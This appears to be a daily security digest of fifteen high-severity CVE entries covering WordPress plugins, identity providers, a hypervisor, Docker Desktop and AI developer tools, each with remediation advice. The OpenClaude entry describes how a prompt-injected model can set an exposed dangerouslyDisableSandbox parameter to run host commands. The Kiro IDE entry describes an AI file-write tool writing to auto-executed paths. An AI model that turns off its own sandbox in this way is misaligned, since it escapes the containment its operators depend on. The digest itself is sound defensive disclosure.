23 vulnerabilities across 15 products scored HIGH or above on June 02, 2026.

  • CRITICAL: 1
  • HIGH: 22

[CRITICAL] themeum/kirki_–_freeform_page_builder,website_builder&_customizer

1 CVE | CVSS 3.1: 9.8 | AAS 12.2

The Kirki – Freeform Page Builder plugin for WordPress versions 6.0.0 through 6.0.6 contains a critical privilege escalation vulnerability (CVE-2026-8206, CVSS 9.8) that allows unauthenticated attackers to perform account takeover. The flaw enables attackers to send password reset links for any user account to an attacker-controlled email address by manipulating the email parameter in password reset requests. WordPress site administrators using affected versions should immediately update to the patched release and consider enforcing additional authentication controls such as multi-factor authentication.

Vendor Advisory

[HIGH] dräger/core

1 CVE | CVSS 4.0: 8.7 | AAS 11.2

Dräger Core 1.0.5 and M540 Converter Service 1.0.9 are vulnerable to a high-severity denial of service attack (CVE-2024-14036, CVSS 8.7) that allows network-adjacent attackers to exhaust CPU resources by sending specially crafted SDC discovery messages. This vulnerability affects hospital networks and can prevent affected systems from processing legitimate SDC communications. Healthcare organizations running these products should immediately apply vendor patches and implement network segmentation to restrict access to the discovery process to trusted systems only.

Vendor Advisory

[HIGH] gitlawb/openclaude

2 CVEs | CVSS 4.0: 9.3 | AAS 10.6

OpenClaude prior to version 0.5.1 is vulnerable to sandbox escape attacks including multiple critical vulnerabilities (CVE-2026-42074 and CVE-2026-42073, CVSS 9.3) that allow prompt-injected LLMs to execute arbitrary commands with full host-level access. The vulnerabilities stem from exposure of the dangerouslyDisableSandbox parameter in the BashTool input schema, which an untrusted model can enable to bypass command execution restrictions when paired with the default allowUnsandboxedCommands setting. Organizations and developers using OpenClaude should immediately upgrade to version 0.5.1 or later and review sandbox configuration settings to enforce security constraints.

Vendor Advisory

[HIGH] armember/armember_premium_–_membership_plugin,_content_restriction,_member_levels,user_profile&_user_signup

2 CVEs | CVSS 3.1: 9.8 | AAS 9.7

ARMember Premium versions up to and including 7.3.1 are vulnerable to insecure password reset mechanisms including multiple critical vulnerabilities (CVE-2026-5076 and CVE-2026-5073, CVSS 9.8) that allow attackers to reset user account passwords. The plugin stores plaintext copies of password reset keys in WordPress user metadata, which can be exploited through the plugin’s custom reset function to compromise any member account. WordPress administrators using ARMember Premium should immediately update to the latest patched version and audit user accounts for unauthorized password changes.

Vendor Advisory

[HIGH] progress_software/sitefinity

3 CVEs | CVSS 3.1: 10.0 | AAS 9.7

Progress Sitefinity versions 15.4.8623 before 15.4.8630 contain multiple critical access control vulnerabilities (CVE-2026-7198, CVE-2026-7201, CVE-2026-7312, CVSS 10.0) that allow unauthenticated remote attackers to access restricted content and fully compromise affected installations. An improper access control flaw in the web services layer permits unauthorized disclosure, modification, and disruption of confidential data and system functionality without authentication. Organizations running Sitefinity should immediately upgrade to version 15.4.8630 or later and review access logs for signs of exploitation.

Vendor Advisory

[HIGH] maziyarpanahi/openmed

1 CVE | CVSS 4.0: 9.3 | AAS 9.2

OpenMed before version 1.5.2 is vulnerable to remote code execution (CVE-2026-47117, CVSS 9.3) in its PII privacy-filter model loading mechanism. The vulnerability stems from improper input validation on the model_name parameter, which allows unauthenticated attackers to supply malicious Hugging Face models containing arbitrary code that executes with trust_remote_code enabled. Organizations running OpenMed should immediately upgrade to version 1.5.2 or later and validate the safety of any previously loaded privacy-filter models.

Vendor Advisory

[HIGH] bitdefender/napoca_bare-metal_hypervisor

2 CVEs | CVSS 4.0: 8.5 | AAS 8.9

Bitdefender Napoca bare-metal hypervisor contains multiple out-of-bounds write vulnerabilities (CVE-2026-10046 and CVE-2026-10047, CVSS 8.5) in the BIOS INT 0x15 / E820 memory map handler. The vulnerability allows malicious guest operating systems to write beyond allocated buffer boundaries by supplying crafted register values, potentially enabling hypervisor escape or privilege escalation. Organizations deploying Napoca should apply the latest security updates from Bitdefender and restrict guest operating system privileges where possible.

Vendor Advisory

[HIGH] goauthentik/authentik

4 CVEs | CVSS 3.1: 9.8 | AAS 8.9

authentik, an open-source identity provider, is vulnerable to Source stage bypass including multiple critical vulnerabilities (CVE-2026-49448, CVE-2026-42849, CVE-2026-47201, CVE-2026-49443, CVSS 9.8) in versions prior to 2025.12.6, 2026.2.4, and 2026.5.1. An attacker can bypass authentication checks by sending empty POST requests to the Source stage, potentially gaining unauthorized access to protected resources. Organizations running authentik should immediately upgrade to version 2025.12.6, 2026.2.4, or 2026.5.1 depending on their release branch.

Vendor Advisory

[HIGH] thimpress/thim_core

1 CVE | CVSS 3.1: 8.8 | AAS 8.7

ThimPress Thim Core through version 2.3.3 contains a missing authorization vulnerability (CVE-2025-53345, CVSS 8.8) that allows arbitrary code execution. The flaw enables attackers to bypass authorization checks and execute malicious code when a vulnerable plugin is installed on the system. WordPress administrators using Thim Core should immediately update to the latest patched version and exercise caution when installing third-party plugins from untrusted sources.

Vendor Advisory

[HIGH] aws/kiro_ide

1 CVE | CVSS 4.0: 8.6 | AAS 8.7

Amazon Kiro IDE before version 0.11 contains insufficient access control restrictions in the file write tool (CVE-2026-10591, CVSS 8.6) that allows remote unauthenticated attackers to execute arbitrary commands. The vulnerability enables attackers to write to execution-sensitive paths such as .vscode/tasks.json, which are automatically executed when a folder is opened in the IDE. Developers and organizations using Kiro IDE should immediately upgrade to version 0.11 or later to remediate this vulnerability.

Vendor Advisory

[HIGH] misp/misp

1 CVE | CVSS 4.0: 8.2 | AAS 8.5

MISP contains an authentication bypass vulnerability (CVE-2026-10611, CVSS 8.2) that affects deployments configured with LDAP mixed authentication and OTP enforcement enabled. When LdapAuth.mixedAuth=true and Security.require_otp=true are set, users authenticated through LDAP or other authentication plugins can establish authenticated sessions before the OTP challenge is enforced, allowing attackers with valid primary credentials to bypass multi-factor authentication. MISP administrators should immediately update to the patched version and review authentication configuration to ensure OTP enforcement is properly applied before session establishment.

Vendor Advisory

[HIGH] ahmad/wp_job_portal

1 CVE | CVSS 3.1: 9.3 | AAS 8.4

Ahmad WP Job Portal through version 2.5.1 is vulnerable to blind SQL injection (CVE-2026-42684, CVSS 9.3) due to improper neutralization of special elements in SQL commands. The vulnerability allows attackers to extract sensitive data from the database by crafting malicious input that manipulates SQL queries, potentially compromising job listings, user information, and other critical data. WordPress administrators using WP Job Portal should immediately upgrade to a patched version and implement input validation controls to prevent SQL injection attacks.

Vendor Advisory

[HIGH] elementor/elementor_website_builder

1 CVE | CVSS 3.1: 5.4 | AAS 8.3

Elementor Website Builder through version 4.1.0 contains a missing authorization vulnerability (CVE-2026-49782, CVSS 5.4) that allows exploitation of incorrectly configured access control security levels. The flaw enables attackers to bypass authorization checks and access restricted content or functionality that should be protected by proper access control mechanisms. WordPress administrators using Elementor should immediately upgrade to the latest patched version and verify that access control settings are correctly configured for sensitive pages and content.

Vendor Advisory

[HIGH] docker/docker_desktop

1 CVE | CVSS 4.0: 8.2 | AAS 8.1

Docker Desktop versions prior to 4.76.0 contain a denial of service vulnerability (CVE-2026-8936, CVSS 8.2) caused by unbounded recursion in the grpcfuse kernel module. A malicious or compromised container can trigger a VM panic by creating deeply nested directories on a bind-mounted host folder and inducing a dentry invalidation event, resulting in system unavailability. Docker Desktop users should immediately upgrade to version 4.76.0 or later and exercise caution with container volume mounts from untrusted sources.

Vendor Advisory

[HIGH] jhorowitz/content_visibility_for_divi_builder

1 CVE | CVSS 3.1: 8.8 | AAS 7.9

The Content Visibility for Divi Builder plugin for WordPress versions up to and including 4.02 is vulnerable to remote code execution (CVE-2026-1829, CVSS 8.8) via improper handling of the cvdb_content_visibility_check parameter in the et_pb_text shortcode. Authenticated attackers with Contributor-level access or higher can exploit this vulnerability to execute arbitrary code on the server. WordPress administrators should immediately update to a patched version and review user access levels to ensure only trusted contributors have permission to create or edit content.

Vendor Advisory